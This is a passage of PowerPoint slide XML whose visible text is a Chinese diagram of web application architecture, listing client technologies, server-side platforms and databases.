      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3707904" y="3116165"/>
            <a:ext cx="4020859" cy="2257051"/>
            <a:chOff x="3449669" y="2976713"/>
            <a:chExt cx="4020859" cy="2257051"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 2" descr="http://www.xiazaizhijia.com/uploads/allimg/140208/36-14020Q555323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277" y="3794471"/>
              <a:ext cx="800417" cy="634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ja.ybxww.com/content/2013-7/18/xinhua_sc_yibin2013718172910884E-0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5632" y="4231072"/>
              <a:ext cx="843429" cy="849052"/>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6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6176212" y="4458662"/>
              <a:ext cx="1163237" cy="463072"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 6" descr="http://cms.csdnimg.cn/article/201304/07/516126a4ca9f8.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24085" y="4405672"/>
              <a:ext cx="744017" cy="558013"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="圆角矩形 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4711852" y="3577580"/>
              <a:ext cx="2758676" cy="1656184"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="92D05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79200" tIns="39600" rIns="79200" bIns="39600" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="801370" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="FrutigerNext LT Regular" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="直接箭头连接符 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3449669" y="2976713"/>
              <a:ext cx="1667677" cy="1002827"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="triangle"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332909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bwMode="auto">
          <a:xfrm>
            <a:off x="894341" y="1423897"/>
            <a:ext cx="7560840" cy="1007669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C0000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wordArtVertRtl" lIns="59400" tIns="29700" rIns="59400" bIns="29700" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="600710">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>客户端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="827585" y="764705"/>
            <a:ext cx="5809059" cy="653653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:latin typeface="Palatino Linotype" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:latin typeface="Palatino Linotype" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用架构知识体系</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="日期占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" altLang="zh-CN"/>
              <a:t>Page </a:t>
            </a:r>
            <a:fld id="{41FB7BC9-BB04-450E-B148-C86016622E4B}" type="slidenum">
              <a:rPr lang="de-DE" altLang="zh-CN" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="882489" y="3807045"/>
            <a:ext cx="7560840" cy="168589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wordArtVertRtl" lIns="59400" tIns="29700" rIns="59400" bIns="29700" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="600710">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>存储</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="882489" y="2470552"/>
            <a:ext cx="7560840" cy="1277052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006699"/>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wordArtVertRtl" lIns="59400" tIns="29700" rIns="59400" bIns="29700" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="600710">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1860218" y="1484790"/>
            <a:ext cx="1049982" cy="31039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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTTP/HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1853103" y="1862833"/>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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2532167" y="1862833"/>
            <a:ext cx="617935"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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3180240" y="1866408"/>
            <a:ext cx="1469231" cy="21788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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Javascript/VBScript</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5988542" y="1862829"/>
            <a:ext cx="1782198" cy="23251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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>AJAX/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3418652" y="2580822"/>
            <a:ext cx="2658353" cy="26343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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Servlet/JSP/PHP/ASP/ASP.NET/…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1860219" y="2561641"/>
            <a:ext cx="1492271" cy="27955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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>WEB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>容器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>应用服务器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2613695" y="5211205"/>
            <a:ext cx="61793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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828605" y="5211205"/>
            <a:ext cx="673650"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rgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3370231" y="5226777"/>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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>XPath</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5502494" y="3336686"/>
            <a:ext cx="2511906" cy="355633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B05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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CMS/OA/CRM/ERP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>财务系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>监控系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>其他业务系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1837907" y="4892896"/>
            <a:ext cx="617935"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Oracle</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2608671" y="4883383"/>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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3383582" y="4872313"/>
            <a:ext cx="61793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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Mysql</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4855722" y="4877791"/>
            <a:ext cx="925115"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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4128332" y="4877791"/>
            <a:ext cx="617935"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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DB2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5900458" y="4877790"/>
            <a:ext cx="365522"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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4143501" y="5225602"/>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zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>组件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="矩形 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1853104" y="3356992"/>
            <a:ext cx="3517868" cy="27142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编程语言：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Java/Python/C#/ASP/PHP/Ruby..</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1863017" y="2902495"/>
